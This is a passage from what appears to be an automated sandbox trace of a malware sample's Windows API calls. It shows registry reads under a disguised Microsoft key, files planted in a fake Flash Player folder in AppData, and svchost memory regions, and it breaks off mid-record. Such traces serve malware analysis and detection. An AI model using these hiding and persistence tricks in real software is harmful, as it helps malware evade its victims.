[0328.088] RegFlushKey (hKey=0xb4) returned 0x0 [0329.398] RegNotifyChangeKeyValue (hKey=0xb4, bWatchSubtree=0, dwNotifyFilter=0x4, hEvent=0xe4, fAsynchronous=1) returned 0x0 [0329.399] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x0 [0329.399] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x248f01e, cbMultiByte=76, lpWideCharStr=0x248ee74, cchWideChar=150 | out: lpWideCharStr="Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe") returned 76 [0329.399] PathCombineW (in: pszDest=0x248f5c0, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming", pszFile="Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe" [0329.399] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0329.399] GetFileSizeEx (in: hFile=0xb8, lpFileSize=0x248f294 | out: lpFileSize=0x248f294*=196608) returned 1 [0329.399] VirtualAlloc (lpAddress=0x0, dwSize=0x30000, flAllocationType=0x3000, flProtect=0x4) returned 0x90000 [0329.399] ReadFile (in: hFile=0xb8, lpBuffer=0x90000, nNumberOfBytesToRead=0x30000, lpNumberOfBytesRead=0x248f2a4, lpOverlapped=0x0 | out: lpBuffer=0x90000*, lpNumberOfBytesRead=0x248f2a4*=0x30000, lpOverlapped=0x0) returned 1 [0329.401] VirtualFree (lpAddress=0x90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0329.402] CloseHandle (hObject=0xb8) returned 1 [0329.402] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x248f976, cbMultiByte=76, lpWideCharStr=0x248fe00, cchWideChar=150 | out: lpWideCharStr="Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe") returned 76 [0329.402] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x248f976, cbMultiByte=62, lpWideCharStr=0x248f7c8, cchWideChar=150 | out: lpWideCharStr="Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned 62 [0329.402] PathCombineW (in: pszDest=0x248fbf8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming", pszFile="Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys" [0329.402] FindFirstChangeNotificationW (lpPathName="C:\\Users\\aETAdzjz\\AppData\\Roaming", bWatchSubtree=1, dwNotifyFilter=0x13) returned 0xb8 [0329.402] WaitForMultipleObjects (nCount=0x3, lpHandles=0x248f2b8*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0329.402] CloseHandle (hObject=0xe4) returned 1 [0329.402] RegCloseKey (hKey=0xb4) returned 0x0 [0329.402] ReleaseMutex (hMutex=0x4c) returned 1 [0329.402] CloseHandle (hObject=0x4c) returned 1 Thread: id = 220 os_tid = 0x59c [0313.184] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0313.184] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x268f3ac | out: phkResult=0x268f3ac*=0xb4) returned 0x0 [0313.184] RegQueryValueExW (in: hKey=0xb4, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x268f3d8, lpData=0x0, lpcbData=0x268f3c0*=0x0 | out: lpType=0x268f3d8*=0x3, lpData=0x0, lpcbData=0x268f3c0*=0x6f0) returned 0x0 [0313.184] RegQueryValueExW (in: hKey=0xb4, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x268f3d8, lpData=0x4af890, lpcbData=0x268f3c0*=0x6f0 | out: lpType=0x268f3d8*=0x3, lpData=0x4af890*, lpcbData=0x268f3c0*=0x6f0) returned 0x0 [0313.185] RegCloseKey (hKey=0xb4) returned 0x0 [0313.185] WaitForMultipleObjects (nCount=0x4, lpHandles=0x4af850*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0328.087] ResetEvent (hEvent=0xf8) returned 1 Thread: id = 221 os_tid = 0x60c [0313.185] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0313.185] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x27af244 | out: phkResult=0x27af244*=0xb4) returned 0x0 [0313.185] RegQueryValueExW (in: hKey=0xb4, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x27af270, lpData=0x0, lpcbData=0x27af258*=0x0 | out: lpType=0x27af270*=0x3, lpData=0x0, lpcbData=0x27af258*=0x6f0) returned 0x0 [0313.185] RegQueryValueExW (in: hKey=0xb4, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x27af270, lpData=0x4af890, lpcbData=0x27af258*=0x6f0 | out: lpType=0x27af270*=0x3, lpData=0x4af890*, lpcbData=0x27af258*=0x6f0) returned 0x0 [0313.185] RegCloseKey (hKey=0xb4) returned 0x0 [0313.185] WaitForMultipleObjects (nCount=0x4, lpHandles=0x4af870*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0328.086] ResetEvent (hEvent=0x108) returned 1 Thread: id = 222 os_tid = 0x4f8 [0313.186] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0313.186] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x296ee6a, cbMultiByte=6, lpWideCharStr=0x89730, cchWideChar=10 | out: lpWideCharStr="Acuhci") returned 6 [0313.186] PathCombineW (in: pszDest=0x88f48, pszDir="SOFTWARE\\Microsoft", pszFile="Acuhci" | out: pszDest="SOFTWARE\\Microsoft\\Acuhci") returned="SOFTWARE\\Microsoft\\Acuhci" [0313.186] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x296ee74, cbMultiByte=8, lpWideCharStr=0x89730, cchWideChar=10 | out: lpWideCharStr="Omegovna") returned 8 [0313.186] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x296ed42, cbMultiByte=85, lpWideCharStr=0x296ea6c, cchWideChar=150 | out: lpWideCharStr="Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\rO4p00rRfog3ie0eV3.ecv癦ʖ霰\x08ʖ茶癦霰\x08\x1c绻") returned 85 [0313.186] PathCombineW (in: pszDest=0x89428, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming", pszFile="Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\rO4p00rRfog3ie0eV3.ecv" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\rO4p00rRfog3ie0eV3.ecv") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\rO4p00rRfog3ie0eV3.ecv" [0313.186] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x296eddc, cbMultiByte=85, lpWideCharStr=0x296ea70, cchWideChar=150 | out: lpWideCharStr="Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\Microsoft OneDrive.rigʖ霰\x08ʖ茶癦霰\x08\x1c绻") returned 85 [0313.186] PathCombineW (in: pszDest=0x89748, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming", pszFile="Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\Microsoft OneDrive.rig" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\Microsoft OneDrive.rig") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\Microsoft OneDrive.rig" [0313.186] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x296ee8c | out: phkResult=0x296ee8c*=0xb4) returned 0x0 [0313.186] RegQueryValueExW (in: hKey=0xb4, lpValueName="Omegovna", lpReserved=0x0, lpType=0x296eeb8, lpData=0x0, lpcbData=0x296eea0*=0x0 | out: lpType=0x296eeb8*=0x0, lpData=0x0, lpcbData=0x296eea0*=0x0) returned 0x2 [0313.186] RegCloseKey (hKey=0xb4) returned 0x0 [0313.186] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\rO4p00rRfog3ie0eV3.ecv" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\ro4p00rrfog3ie0ev3.ecv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb4 [0313.186] GetFileSizeEx (in: hFile=0xb4, lpFileSize=0x296ee90 | out: lpFileSize=0x296ee90*=1776) returned 1 [0313.186] VirtualAlloc (lpAddress=0x0, dwSize=0x6f0, flAllocationType=0x3000, flProtect=0x4) returned 0x90000 [0313.186] ReadFile (in: hFile=0xb4, lpBuffer=0x90000, nNumberOfBytesToRead=0x6f0, lpNumberOfBytesRead=0x296eea0, lpOverlapped=0x0 | out: lpBuffer=0x90000*, lpNumberOfBytesRead=0x296eea0*=0x6f0, lpOverlapped=0x0) returned 1 [0313.187] VirtualFree (lpAddress=0x90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0313.187] CloseHandle (hObject=0xb4) returned 1 [0313.188] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x296ebb0 | out: phkResult=0x296ebb0*=0xb4) returned 0x0 [0313.188] RegQueryValueExW (in: hKey=0xb4, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x296ebdc, lpData=0x0, lpcbData=0x296ebc4*=0x0 | out: lpType=0x296ebdc*=0x3, lpData=0x0, lpcbData=0x296ebc4*=0x6f0) returned 0x0 [0313.188] RegQueryValueExW (in: hKey=0xb4, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x296ebdc, lpData=0x4af890, lpcbData=0x296ebc4*=0x6f0 | out: lpType=0x296ebdc*=0x3, lpData=0x4af890*, lpcbData=0x296ebc4*=0x6f0) returned 0x0 [0313.188] RegCloseKey (hKey=0xb4) returned 0x0 [0313.188] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x296eb7a, cbMultiByte=6, lpWideCharStr=0x89a00, cchWideChar=10 | out: lpWideCharStr="Acuhci") returned 6 [0313.188] PathCombineW (in: pszDest=0x89998, pszDir="SOFTWARE\\Microsoft", pszFile="Acuhci" | out: pszDest="SOFTWARE\\Microsoft\\Acuhci") returned="SOFTWARE\\Microsoft\\Acuhci" [0313.188] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x296eb8e, cbMultiByte=4, lpWideCharStr=0x89a00, cchWideChar=10 | out: lpWideCharStr="Etegci") returned 4 [0313.189] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x296eb98 | out: phkResult=0x296eb98*=0xb4) returned 0x0 [0313.189] RegQueryValueExW (in: hKey=0xb4, lpValueName="Eteg", lpReserved=0x0, lpType=0x296eec8, lpData=0x0, lpcbData=0x296ebac*=0x0 | out: lpType=0x296eec8*=0x0, lpData=0x0, lpcbData=0x296ebac*=0x0) returned 0x2 [0313.189] RegCloseKey (hKey=0xb4) returned 0x0 [0313.190] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0xea60) returned 0x0 Thread: id = 223 os_tid = 0x460 [0313.190] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0xffffffff) returned 0x0 [0328.086] WaitForSingleObject (hHandle=0xe4, dwMilliseconds=0x0) returned 0x0 [0328.086] CloseHandle (hObject=0xe4) returned 1 [0328.086] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0x0) returned 0x102 [0328.086] WaitForSingleObject (hHandle=0xfc, dwMilliseconds=0x0) returned 0x102 [0328.086] WaitForSingleObject (hHandle=0x10c, dwMilliseconds=0x0) returned 0x102 [0328.086] WaitForSingleObject (hHandle=0x110, dwMilliseconds=0x0) returned 0x102 [0328.086] WaitForMultipleObjects (nCount=0x4, lpHandles=0x876cc*=0xec, bWaitAll=1, dwMilliseconds=0x4e20) returned 0x0 [0329.403] RtlRemoveVectoredExceptionHandler () returned 0x1 [0329.403] CryptReleaseContext (hProv=0x2de630, dwFlags=0x0) returned 1 [0329.403] CloseHandle (hObject=0x8) returned 1 [0329.403] ExitProcess (uExitCode=0x0) Process: id = "18" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x6a4d000" os_pid = "0x3e8" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "16" os_parent_pid = "0x320" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\sppuinotify" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\THREADORDER" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000cba4" [0xc000000f], "LOCAL" [0x7] Region: id = 3082 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3083 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 3084 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3085 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3086 start_va = 0x50000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 3087 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 3088 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 3089 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 3090 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 3091 start_va = 0x110000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 3092 start_va = 0x210000 end_va = 0x276fff entry_point = 0x210000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3093 start_va = 0x280000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 3094 start_va = 0x380000 end_va = 0x383fff entry_point = 0x380000 region_type = mapped_file name = "stdole2.tlb" filename = "\\Windows\\System32\\stdole2.tlb" (normalized: "c:\\windows\\system32\\stdole2.tlb") Region: id = 3095 start_va = 0x390000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 3096 start_va = 0x3a0000 end_va = 0x527fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 3097 start_va = 0x530000 end_va = 0x6b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3098 start_va = 0x6c0000 end_va = 0x77ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006c0000" filename = "" Region: id = 3099 start_va = 0x780000 end_va = 0xb72fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000780000" filename = "" Region: id = 3100 start_va = 0xb80000 end_va = 0xb90fff entry_point = 0xb80000 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 3101 start_va = 0xba0000 end_va = 0xba1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ba0000" filename = "" Region: id = 3102 start_va = 0xbb0000 end_va = 0xbb0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000bb0000" filename = "" Region: id = 3103 start_va = 0xc00000 end_va = 0xc7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c00000" filename = "" Region: id = 3104 start_va = 0xcc0000 end_va = 0xd3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000cc0000" filename = "" Region: id = 3105 start_va = 0xd60000 end_va = 0xddffff entry_point = 0x0 region_type = private name = "private_0x0000000000d60000" filename = "" Region: id = 3106 start_va = 0xe40000 end_va = 0xe4ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e40000" filename = "" Region: id = 3107 start_va = 0xe50000 end_va = 0xecffff entry_point = 0x0 region_type = private name = "private_0x0000000000e50000" filename = "" Region: id = 3108 start_va = 0xf40000 end_va = 0xfbffff entry_point = 0x0 region_type = private name = "private_0x0000000000f40000" filename = "" Region: id = 3109 start_va = 0xfe0000 end_va = 0x105ffff entry_point = 0x0 region_type = private name = "private_0x0000000000fe0000" filename = "" Region: id = 3110 start_va = 0x1090000 end_va = 0x135efff entry_point = 0x1090000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3111 start_va = 0x1360000 end_va = 0x145ffff entry_point = 0x0 region_type = private name = "private_0x0000000001360000" filename = "" Region: id = 3112 start_va = 0x14d0000 end_va = 0x154ffff entry_point = 0x0 region_type = private name = "private_0x00000000014d0000" filename = "" Region: id = 3113 start_va = 0x15e0000 end_va = 0x165ffff entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 3114 start_va = 0x1660000 end_va = 0x175ffff entry_point = 0x0 region_type = private name = "private_0x0000000001660000" filename = "" Region: id = 3115 start_va = 0x1780000 end_va = 0x17fffff entry_point = 0x0 region_type = private name = "private_0x0000000001780000" filename = "" Region: id = 3116 start_va = 0x1800000 end_va = 0x18bffff entry_point = 0x1800000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 3117 start_va = 0x18c0000 end_va = 0x193ffff entry_point = 0x0 region_type = private name = "private_0x00000000018c0000" filename = "" Region: id = 3118 start_va = 0x19d0000 end_va = 0x1a4ffff entry_point = 0x0 region_type = private name = "private_0x00000000019d0000" filename = "" Region: id = 3119 start_va = 0x1a50000 end_va = 0x1b4ffff entry_point = 0x0 region_type = private name = "private_0x0000000001a50000" filename = "" Region: id = 3120 start_va = 0x1be0000 end_va = 0x1c5ffff entry_point = 0x0 region_type = private name = "private_0x0000000001be0000" filename = "" Region: id = 3121 start_va = 0x1c90000 end_va = 0x1d0ffff entry_point = 0x0 region_type = private name = "private_0x0000000001c90000" filename = "" Region: id = 3122 start_va = 0x1d30000 end_va = 0x1daffff entry_point = 0x0 region_type = private name = "private_0x0000000001d30000" filename = "" Region: id = 3123 start_va = 0x1df0000 end_va = 0x1dfffff entry_point = 0x0 region_type = private name = "private_0x0000000001df0000" filename = "" Region: id = 3124 start_va = 0x1e20000 end_va = 0x1e9ffff entry_point = 0x0 region_type = private name = "private_0x0000000001e20000" filename = "" Region: id = 3125 start_va = 0x1f30000 end_va = 0x1faffff entry_point = 0x0 region_type = private name = "private_0x0000000001f30000" filename = "" Region: id = 3126 start_va = 0x1fb0000 end_va = 0x202ffff entry_point = 0x0 region_type = private name = "private_0x0000000001fb0000" filename = "" Region: id = 3127 start_va = 0x2050000 end_va = 0x20cffff entry_point = 0x0 region_type = private name = "private_0x0000000002050000" filename = "" Region: id = 3128 start_va = 0x2150000 end_va = 0x215ffff entry_point = 0x0 region_type = private name = "private_0x0000000002150000" filename = "" Region: id = 3129 start_va = 0x22a0000 end_va = 0x231ffff entry_point = 0x0 region_type = private name = "private_0x00000000022a0000" filename = "" Region: id = 3130 start_va = 0x2340000 end_va = 0x23bffff entry_point = 0x0 region_type = private name = "private_0x0000000002340000" filename = "" Region: id = 3131 start_va = 0x23c0000 end_va = 0x25bffff entry_point = 0x0 region_type = private name = "private_0x00000000023c0000" filename = "" Region: id = 3132 start_va = 0x74480000 end_va = 0x74482fff entry_point = 0x74480000 region_type = mapped_file name = "sfc.dll" filename = "\\Windows\\System32\\sfc.dll" (normalized: "c:\\windows\\system32\\sfc.dll") Region: id = 3133 start_va = 0x778b0000 end_va = 0x779a9fff entry_point = 0x778b0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3134 start_va = 0x779b0000 end_va = 0x77acefff entry_point = 0x779b0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3135 start_va = 0x77ad0000 end_va = 0x77c78fff entry_point = 0x77ad0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3136 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 3137 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 3138 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3139 start_va = 0xffd20000 end_va = 0xffd2afff entry_point = 0xffd20000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 3140 start_va = 0x7fef44c0000 end_va = 0x7fef4597fff entry_point = 0x7fef44c0000 region_type = mapped_file name = "perftrack.dll" filename = "\\Windows\\System32\\perftrack.dll" (normalized: "c:\\windows\\system32\\perftrack.dll") Region: id = 3141 start_va = 0x7fef45b0000 end_va = 0x7fef45bbfff entry_point = 0x7fef45b0000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 3142 start_va = 0x7fef4740000 end_va = 0x7fef4758fff entry_point = 0x7fef4740000 region_type = mapped_file name = "wdi.dll" filename = "\\Windows\\System32\\wdi.dll" (normalized: "c:\\windows\\system32\\wdi.dll") Region: id = 3143 start_va = 0x7fef5290000 end_va = 0x7fef530bfff entry_point = 0x7fef5290000 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Region: id = 3144 start_va = 0x7fef5a70000 end_va = 0x7fef5a77fff entry_point = 0x7fef5a70000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 3145 start_va = 0x7fef68c0000 end_va = 0x7fef68cffff entry_point = 0x7fef68c0000 region_type = mapped_file name = "sfc_os.dll" filename = "\\Windows\\System32\\sfc_os.dll" (normalized: "c:\\windows\\system32\\sfc_os.dll") Region: id = 3146 start_va = 0x7fef68d0000 end_va = 0x7fef68e1fff entry_point = 0x7fef68d0000 region_type = mapped_file name = "aepic.dll" filename = "\\Windows\\System32\\aepic.dll" (normalized: "c:\\windows\\system32\\aepic.dll") Region: id = 3147 start_va = 0x7fef69e0000 end_va = 0x7fef6a43fff entry_point = 0x7fef69e0000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 3148 start_va = 0x7fef6a50000 end_va = 0x7fef6ac0fff entry_point = 0x7fef6a50000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 3149 start_va = 0x7fef7ec0000 end_va = 0x7fef7f33fff entry_point = 0x7fef7ec0000 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 3150 start_va = 0x7fefb130000 end_va = 0x7fefb148fff entry_point = 0x7fefb130000 region_type = mapped_file name = "pnrpnsp.dll" filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll") Region: id = 3151 start_va = 0x7fefb150000 end_va = 0x7fefb164fff entry_point = 0x7fefb150000 region_type = mapped_file name = "napinsp.dll" filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll") Region: id = 3152 start_va = 0x7fefb480000 end_va = 0x7fefb497fff entry_point = 0x7fefb480000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 3153 start_va = 0x7fefb4a0000 end_va = 0x7fefb4b0fff entry_point = 0x7fefb4a0000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 3154 start_va = 0x7fefb4d0000 end_va = 0x7fefb522fff entry_point = 0x7fefb4d0000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3155 start_va = 0x7fefb600000 end_va = 0x7fefb609fff entry_point = 0x7fefb600000 region_type = mapped_file name = "nsisvc.dll" filename = "\\Windows\\System32\\nsisvc.dll" (normalized: "c:\\windows\\system32\\nsisvc.dll") Region: id = 3156 start_va = 0x7fefb620000 end_va = 0x7fefb62afff entry_point = 0x7fefb620000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 3157 start_va = 0x7fefb630000 end_va = 0x7fefb656fff entry_point = 0x7fefb630000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 3158 start_va = 0x7fefb6a0000 end_va = 0x7fefb706fff entry_point = 0x7fefb6a0000 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 3159 start_va = 0x7fefb7a0000 end_va = 0x7fefb7b4fff entry_point = 0x7fefb7a0000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 3160 start_va = 0x7fefbc60000 end_va = 0x7fefbc6afff entry_point = 0x7fefbc60000 region_type = mapped_file name = "winrnr.dll" filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll") Region: id = 3161 start_va = 0x7fefbf10000 end_va = 0x7fefbf27fff entry_point = 0x7fefbf10000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 3162 start_va = 0x7fefcbe0000 end_va = 0x7fefcbebfff entry_point = 